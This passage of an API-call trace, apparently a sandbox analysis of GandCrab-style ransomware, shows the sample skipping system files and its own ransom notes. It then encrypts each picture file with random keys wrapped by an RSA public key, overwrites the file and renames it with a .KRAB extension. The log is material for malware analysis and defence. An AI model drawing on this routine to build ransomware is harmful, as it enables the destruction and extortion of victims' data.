(lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\3ZrDCz9Yil.png") returned 53 [0096.881] lstrlenW (lpString=".png") returned 4 [0096.881] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0096.882] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".png ") returned 5 [0096.882] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.882] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\3ZrDCz9Yil.png") returned 53 [0096.882] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\3ZrDCz9Yil.png") returned 53 [0096.882] lstrcmpiW (lpString1="3ZrDCz9Yil.png", lpString2="desktop.ini") returned -1 [0096.882] lstrcmpiW (lpString1="3ZrDCz9Yil.png", lpString2="autorun.inf") returned -1 [0096.882] lstrcmpiW (lpString1="3ZrDCz9Yil.png", lpString2="ntuser.dat") returned -1 [0096.882] lstrcmpiW (lpString1="3ZrDCz9Yil.png", lpString2="iconcache.db") returned -1 [0096.882] lstrcmpiW (lpString1="3ZrDCz9Yil.png", lpString2="bootsect.bak") returned -1 [0096.882] lstrcmpiW (lpString1="3ZrDCz9Yil.png", lpString2="boot.ini") returned -1 [0096.882] lstrcmpiW (lpString1="3ZrDCz9Yil.png", lpString2="ntuser.dat.log") returned -1 [0096.882] lstrcmpiW (lpString1="3ZrDCz9Yil.png", lpString2="thumbs.db") returned -1 [0096.883] lstrcmpiW (lpString1="3ZrDCz9Yil.png", lpString2="KRAB-DECRYPT.html") returned -1 [0096.883] lstrcmpiW (lpString1="3ZrDCz9Yil.png", lpString2="KRAB-DECRYPT.txt") returned -1 [0096.883] lstrcmpiW (lpString1="3ZrDCz9Yil.png", lpString2="CRAB-DECRYPT.txt") returned -1 [0096.883] lstrcmpiW (lpString1="3ZrDCz9Yil.png", lpString2="ntldr") returned -1 [0096.883] lstrcmpiW (lpString1="3ZrDCz9Yil.png", lpString2="NTDETECT.COM") returned -1 [0096.883] lstrcmpiW (lpString1="3ZrDCz9Yil.png", lpString2="Bootfont.bin") returned -1 [0096.883] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0096.883] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x10113d0) returned 1 [0096.884] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0096.884] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0096.884] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0096.884] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0096.884] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0096.884] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.885] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010df8) returned 1 [0096.885] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0096.886] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0096.886] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0096.886] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0096.886] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0096.886] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.886] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x10113d0) returned 1 [0096.887] CryptImportKey (in: hProv=0x10113d0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd3e0) returned 1 [0096.887] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0096.887] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0096.887] GetLastError () returned 0x0 [0096.887] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0096.887] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0096.887] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x10111b0) returned 1 [0096.888] CryptImportKey (in: hProv=0x10111b0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd3e0) returned 1 [0096.888] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0096.888] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0096.888] GetLastError () returned 0x0 [0096.888] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0096.888] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0096.888] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\3ZrDCz9Yil.png" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\cla7ojk\\3zrdcz9yil.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0096.889] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0096.889] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0096.890] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0x6d0c, lpOverlapped=0x0) returned 1 [0096.903] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xffff92f4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.903] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x6d0c, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0x6d0c, lpOverlapped=0x0) returned 1 [0096.904] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0096.904] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.917] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.918] CloseHandle (hObject=0x3a8) returned 1 [0096.918] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.918] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\3ZrDCz9Yil.png" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\cla7ojk\\3zrdcz9yil.png"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\3ZrDCz9Yil.png.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\cla7ojk\\3zrdcz9yil.png.krab")) returned 1 [0096.919] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.919] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0096.919] lstrcmpW (lpString1="ag0sPejby4OATg7UoJ.bmp", lpString2=".") returned 1 [0096.919] lstrcmpW (lpString1="ag0sPejby4OATg7UoJ.bmp", lpString2="..") returned 1 [0096.919] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\", lpString2="ag0sPejby4OATg7UoJ.bmp" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\ag0sPejby4OATg7UoJ.bmp") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\ag0sPejby4OATg7UoJ.bmp" [0096.919] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0096.920] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\ag0sPejby4OATg7UoJ.bmp.KRAB") returned 66 [0096.920] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\ag0sPejby4OATg7UoJ.bmp") returned 61 [0096.920] lstrlenW (lpString=".bmp") returned 4 [0096.920] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0096.920] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".bmp ") returned 5 [0096.920] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.921] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\ag0sPejby4OATg7UoJ.bmp") returned 61 [0096.921] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\ag0sPejby4OATg7UoJ.bmp") returned 61 [0096.921] lstrcmpiW (lpString1="ag0sPejby4OATg7UoJ.bmp", lpString2="desktop.ini") returned -1 [0096.921] lstrcmpiW (lpString1="ag0sPejby4OATg7UoJ.bmp", lpString2="autorun.inf") returned -1 [0096.921] lstrcmpiW (lpString1="ag0sPejby4OATg7UoJ.bmp", lpString2="ntuser.dat") returned -1 [0096.921] lstrcmpiW (lpString1="ag0sPejby4OATg7UoJ.bmp", lpString2="iconcache.db") returned -1 [0096.921] lstrcmpiW (lpString1="ag0sPejby4OATg7UoJ.bmp", lpString2="bootsect.bak") returned -1 [0096.921] lstrcmpiW (lpString1="ag0sPejby4OATg7UoJ.bmp", lpString2="boot.ini") returned -1 [0096.921] lstrcmpiW (lpString1="ag0sPejby4OATg7UoJ.bmp", lpString2="ntuser.dat.log") returned -1 [0096.921] lstrcmpiW (lpString1="ag0sPejby4OATg7UoJ.bmp", lpString2="thumbs.db") returned -1 [0096.921] lstrcmpiW (lpString1="ag0sPejby4OATg7UoJ.bmp", lpString2="KRAB-DECRYPT.html") returned -1 [0096.921] lstrcmpiW (lpString1="ag0sPejby4OATg7UoJ.bmp", lpString2="KRAB-DECRYPT.txt") returned -1 [0096.921] lstrcmpiW (lpString1="ag0sPejby4OATg7UoJ.bmp", lpString2="CRAB-DECRYPT.txt") returned -1 [0096.921] lstrcmpiW (lpString1="ag0sPejby4OATg7UoJ.bmp", lpString2="ntldr") returned -1 [0096.921] lstrcmpiW (lpString1="ag0sPejby4OATg7UoJ.bmp", lpString2="NTDETECT.COM") returned -1 [0096.921] lstrcmpiW (lpString1="ag0sPejby4OATg7UoJ.bmp", lpString2="Bootfont.bin") returned -1 [0096.921] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0096.922] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010f08) returned 1 [0096.922] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0096.922] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0096.923] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0096.923] CryptGenRandom (in: hProv=0x1010f08, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0096.923] CryptReleaseContext (hProv=0x1010f08, dwFlags=0x0) returned 1 [0096.923] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.923] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011678) returned 1 [0096.924] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0096.924] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0096.924] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0096.924] CryptGenRandom (in: hProv=0x1011678, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0096.925] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0096.925] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.925] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1011898) returned 1 [0096.925] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd5a0) returned 1 [0096.925] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0096.925] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0096.926] GetLastError () returned 0x0 [0096.926] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0096.926] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0096.926] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x10112c0) returned 1 [0096.926] CryptImportKey (in: hProv=0x10112c0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd3e0) returned 1 [0096.926] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0096.926] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0096.927] GetLastError () returned 0x0 [0096.927] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0096.927] CryptReleaseContext (hProv=0x10112c0, dwFlags=0x0) returned 1 [0096.927] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\ag0sPejby4OATg7UoJ.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\cla7ojk\\ag0spejby4oatg7uoj.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0096.927] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0096.928] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0096.928] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0x3e53, lpOverlapped=0x0) returned 1 [0096.941] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xffffc1ad, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.941] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x3e53, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0x3e53, lpOverlapped=0x0) returned 1 [0096.942] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0096.942] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.946] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.946] CloseHandle (hObject=0x3a8) returned 1 [0096.946] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.946] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\ag0sPejby4OATg7UoJ.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\cla7ojk\\ag0spejby4oatg7uoj.bmp"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\ag0sPejby4OATg7UoJ.bmp.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\cla7ojk\\ag0spejby4oatg7uoj.bmp.krab")) returned 1 [0096.947] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.948] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0096.948] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0096.948] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0096.948] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\d2ca4a08d2ca4dee3d.lock" [0096.948] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0096.948] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 67 [0096.948] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\d2ca4a08d2ca4dee3d.lock") returned 62 [0096.948] lstrlenW (lpString=".lock") returned 5 [0096.948] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0096.948] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0096.949] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.949] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.949] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0096.949] lstrcmpW (lpString1="i892iq06tW6N2mNv4x.png", lpString2=".") returned 1 [0096.949] lstrcmpW (lpString1="i892iq06tW6N2mNv4x.png", lpString2="..") returned 1 [0096.949] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\", lpString2="i892iq06tW6N2mNv4x.png" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\i892iq06tW6N2mNv4x.png") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\i892iq06tW6N2mNv4x.png" [0096.949] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0096.950] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\i892iq06tW6N2mNv4x.png.KRAB") returned 66 [0096.950] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\i892iq06tW6N2mNv4x.png") returned 61 [0096.950] lstrlenW (lpString=".png") returned 4 [0096.950] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0096.950] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".png ") returned 5 [0096.950] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.950] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\i892iq06tW6N2mNv4x.png") returned 61 [0096.950] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\i892iq06tW6N2mNv4x.png") returned 61 [0096.950] lstrcmpiW (lpString1="i892iq06tW6N2mNv4x.png", lpString2="desktop.ini") returned 1 [0096.951] lstrcmpiW (lpString1="i892iq06tW6N2mNv4x.png", lpString2="autorun.inf") returned 1 [0096.951] lstrcmpiW (lpString1="i892iq06tW6N2mNv4x.png", lpString2="ntuser.dat") returned -1 [0096.951] lstrcmpiW (lpString1="i892iq06tW6N2mNv4x.png", lpString2="iconcache.db") returned -1 [0096.951] lstrcmpiW (lpString1="i892iq06tW6N2mNv4x.png", lpString2="bootsect.bak") returned 1 [0096.951] lstrcmpiW (lpString1="i892iq06tW6N2mNv4x.png", lpString2="boot.ini") returned 1 [0096.951] lstrcmpiW (lpString1="i892iq06tW6N2mNv4x.png", lpString2="ntuser.dat.log") returned -1 [0096.951] lstrcmpiW (lpString1="i892iq06tW6N2mNv4x.png", lpString2="thumbs.db") returned -1 [0096.951] lstrcmpiW (lpString1="i892iq06tW6N2mNv4x.png", lpString2="KRAB-DECRYPT.html") returned -1 [0096.951] lstrcmpiW (lpString1="i892iq06tW6N2mNv4x.png", lpString2="KRAB-DECRYPT.txt") returned -1 [0096.951] lstrcmpiW (lpString1="i892iq06tW6N2mNv4x.png", lpString2="CRAB-DECRYPT.txt") returned 1 [0096.951] lstrcmpiW (lpString1="i892iq06tW6N2mNv4x.png", lpString2="ntldr") returned -1 [0096.951] lstrcmpiW (lpString1="i892iq06tW6N2mNv4x.png", lpString2="NTDETECT.COM") returned -1 [0096.951] lstrcmpiW (lpString1="i892iq06tW6N2mNv4x.png", lpString2="Bootfont.bin") returned 1 [0096.951] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0096.951] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x10111b0) returned 1 [0096.952] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0096.952] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0096.953] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0096.953] CryptGenRandom (in: hProv=0x10111b0, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0096.953] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0096.953] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.953] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010df8) returned 1 [0096.953] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0096.955] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0096.956] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0096.956] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0096.956] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0096.956] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.956] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1011898) returned 1 [0096.957] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd3e0) returned 1 [0096.957] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0096.957] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0096.957] GetLastError () returned 0x0 [0096.957] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0096.957] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0096.957] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1011678) returned 1 [0096.958] CryptImportKey (in: hProv=0x1011678, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd3e0) returned 1 [0096.958] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0096.958] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0096.958] GetLastError () returned 0x0 [0096.958] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0096.958] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0096.958] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\i892iq06tW6N2mNv4x.png" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\cla7ojk\\i892iq06tw6n2mnv4x.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0096.959] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0096.959] VirtualAlloc 